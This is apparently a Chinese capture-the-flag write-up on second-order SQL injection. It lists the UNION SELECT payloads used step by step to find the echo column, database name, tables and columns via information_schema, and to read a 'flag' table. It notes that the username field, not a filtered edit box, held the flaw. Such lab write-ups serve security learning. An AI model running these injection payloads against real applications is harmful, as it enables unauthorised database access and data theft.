目录
首先,尝试一下回显位的个数
第二步获取数据库名称
第三步,获得表名
第四步,获得列名
最后获取flag
总结 :二次注入,首先我们需要锁定是哪里哪个文本框存在二次注入,以这道题为例,首先我以为是登录进去的编辑
打开题目,注册登录,然后登录以后会有一个
然后结合题目,妥妥的二次注入的题目呀
直接进行构造
首先,尝试一下回显位的个数
'union select 1,2# 没回显
'union select 1# 
直接发现了回显位置
第二步获取数据库名称
' union select database() # 获得 
第三步,获得表名
1' union select group_concat(table_name) from information_schema.tables where database()=table_schema#
flag查询到了表名 flag,news,users
第四步,获得列名
1' union select group_concat(column_name) from information_schema.columns where table_name="flag" #
列名为:flag
最后获取flag
1' union select group_concat(flag) from flag#
总结 :二次注入,首先我们需要锁定是哪里哪个文本框存在二次注入,以这道题为例,首先我以为是登录进去的
首先我认为是这个登陆进去以后的,change这个文本框存在二次注入但是实验了以后发现它存在过滤,然后就继续寻找,最后找到了用户名这个。
